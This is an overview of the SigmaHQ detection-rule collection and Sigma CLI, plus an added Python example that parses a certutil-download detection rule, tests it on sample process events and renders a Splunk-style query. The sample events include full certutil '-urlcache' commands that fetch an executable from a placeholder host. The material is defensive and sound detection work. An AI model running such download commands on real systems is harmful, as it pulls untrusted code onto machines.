Convert Sigma detection rules into your SIEM platform's query language using Sigma CLI to start detecting threats without writing queries from scratch.
Find pre-written detection rules for a specific attack technique and convert them to run in your existing security platform.
Run compliance checks by applying Sigma rules that flag log events violating CIS Controls or NIST frameworks.
Contribute a community detection rule that works across IBM QRadar, MISP, and other platforms without writing platform-specific queries.
Requires Sigma CLI to convert rules; each target security platform additionally needs its own backend package installed as a Sigma CLI plugin.
Sigma is an open format for writing detection rules that describe suspicious patterns in log events. When a company runs servers and applications, those systems produce logs: records of the actions that happen on them. Security teams analyze those logs for signs of attackers or malware. The problem is that every security monitoring platform uses its own query language, so a detection rule written for one tool cannot be used directly in another. Sigma solves this by providing a common format: you write the rule once, then convert it to whatever language your particular security platform uses.

This repository is the main collection of Sigma rules maintained by the community. It currently holds more than 3,000 detection rules organized into several categories. Generic detection rules look for behaviors associated with attack techniques regardless of who is carrying out the attack. Threat hunting rules are deliberately broader, so they produce more noise and are meant as a starting point for investigating suspicious patterns rather than as alerts on their own. Emerging threat rules cover specific, time-sensitive events such as the exploitation of a freshly disclosed vulnerability or an active attack campaign. Compliance rules help teams spot log events that indicate a violation of security frameworks such as CIS Controls or NIST.

The rules are written in YAML, a plain-text format readable by both humans and machines. You can convert them to your platform's query language with the command-line tool Sigma CLI or the web interface at sigconverter.io. A wide range of commercial and open-source security platforms already support Sigma rules directly, including IBM QRadar, MISP, and several others listed in the README. The project is community-driven and peer-reviewed: rule submissions go through a review process before being accepted into the main repository.
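The following is an added example, not code from the SigmaHQ repository or from pySigma, showing what a Sigma rule in the YAML format described above actually expresses: it parses a constructed rule (real Sigma syntax: `Field|modifier` keys, a list of values meaning "any of", a `condition` over named selections), evaluates the detection logic against three constructed process_creation events, and renders the same rule as a Splunk-style search string. The rule, the sample events, the minimal YAML parser and the query dialect are all assumptions made for this example; real conversion goes through Sigma CLI and a backend plugin, which also handle escaping, field-name mappings and the full modifier set.

```python
# Added example (not SigmaHQ or pySigma code): parse a Sigma rule, evaluate it
# against constructed events, and render it as a Splunk-style search.
# The rule, the events and the query dialect are constructed for this example.

RULE_YAML = r"""
title: Certutil URL Cache Download (constructed example rule)
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - 'urlcache'
      - 'verifyctl'
  filter:
    ParentImage|endswith: '\msiexec.exe'
  condition: selection and not filter
level: high
"""


def _scalar(v):
    v = v.strip()
    return v[1:-1] if len(v) >= 2 and v[0] == v[-1] and v[0] in "'\"" else v


def parse_rule(text):
    """Parse only the YAML subset a simple rule needs: nested mappings, lists
    of scalars, quoted or bare scalars. Real tooling should use PyYAML/pySigma."""
    root = {}
    stack = [(-1, root)]   # (indent, mapping currently being filled)
    pending = None         # (mapping, key) that a following "- item" belongs to
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent, line = len(raw) - len(raw.lstrip(' ')), raw.strip()
        if line.startswith('- '):              # list item under `pending`
            mapping, key = pending
            if not isinstance(mapping[key], list):
                mapping[key] = []
            mapping[key].append(_scalar(line[2:]))
            continue
        while stack[-1][0] >= indent:          # leave deeper mappings
            stack.pop()
        mapping = stack[-1][1]
        key, _, value = line.partition(':')
        if value.strip():
            mapping[key] = _scalar(value)
        else:                                  # a mapping or list follows
            mapping[key] = {}
            stack.append((indent, mapping[key]))
            pending = (mapping, key)
    return root


def _field_matches(spec, wanted, event):
    """Sigma field semantics: `Field|modifier`; a list means any value may
    match; string comparison is case-insensitive."""
    field, _, modifier = spec.partition('|')
    actual = str(event.get(field, '')).lower()
    for value in (wanted if isinstance(wanted, list) else [wanted]):
        value = str(value).lower()
        if ((modifier == 'contains' and value in actual)
                or (modifier == 'startswith' and actual.startswith(value))
                or (modifier == 'endswith' and actual.endswith(value))
                or (modifier == '' and actual == value)):
            return True
    return False


def rule_matches(rule, event):
    """Evaluate `condition` (selection names joined by and/or, optional `not`,
    no parentheses) against one event; every key of a selection must match."""
    detection = rule['detection']

    def term(name):
        negate = name.startswith('not ')
        sel = detection[name[4:].strip() if negate else name]
        return all(_field_matches(k, v, event) for k, v in sel.items()) != negate

    return any(all(term(t.strip()) for t in clause.split(' and '))
               for clause in detection['condition'].split(' or '))


def to_query(rule):
    """Render the rule as a Splunk-style search (illustrative dialect only)."""
    detection = rule['detection']
    wild = {'contains': '*{}*', 'startswith': '{}*', 'endswith': '*{}', '': '{}'}

    def field_term(spec, wanted):
        field, _, modifier = spec.partition('|')
        terms = ['{}="{}"'.format(field, wild[modifier].format(v))
                 for v in (wanted if isinstance(wanted, list) else [wanted])]
        return terms[0] if len(terms) == 1 else '(' + ' OR '.join(terms) + ')'

    query = detection['condition']
    for name, sel in detection.items():       # selection names must not collide
        if name != 'condition':
            query = query.replace(name, '(' + ' '.join(
                field_term(k, v) for k, v in sel.items()) + ')')
    return query.replace(' and not ', ' NOT ').replace(' and ', ' ').replace(' or ', ' OR ')


# Constructed process_creation events, not real telemetry.
SAMPLE_EVENTS = [
    {'Image': r'C:\Windows\System32\certutil.exe', 'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': 'certutil.exe -urlcache -split -f http://example.test/a.exe a.exe'},
    {'Image': r'C:\Windows\System32\certutil.exe', 'ParentImage': r'C:\Windows\System32\msiexec.exe',
     'CommandLine': 'certutil -urlcache -f http://vendor.test/pkg.cab pkg.cab'},   # removed by filter
    {'Image': r'C:\Windows\System32\certutil.exe', 'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': 'certutil -hashfile a.exe SHA256'},                           # no download verb
]


def matching_events(rule_yaml=RULE_YAML, events=SAMPLE_EVENTS):
    rule = parse_rule(rule_yaml)
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


if __name__ == '__main__':
    print(to_query(parse_rule(RULE_YAML)))
    print('matching events:', matching_events())   # [0]
```

Only the first event fires: the second is the same download command but launched by msiexec.exe, which the `filter` selection excludes, and the third runs certutil without a download verb. With the real tooling the same file converts with `sigma convert -t splunk -p splunk_windows rule.yml` after `pip install sigma-cli` and `sigma plugin install splunk`; the backend output differs from the illustrative string above because the Splunk backend applies its own escaping and field mappings.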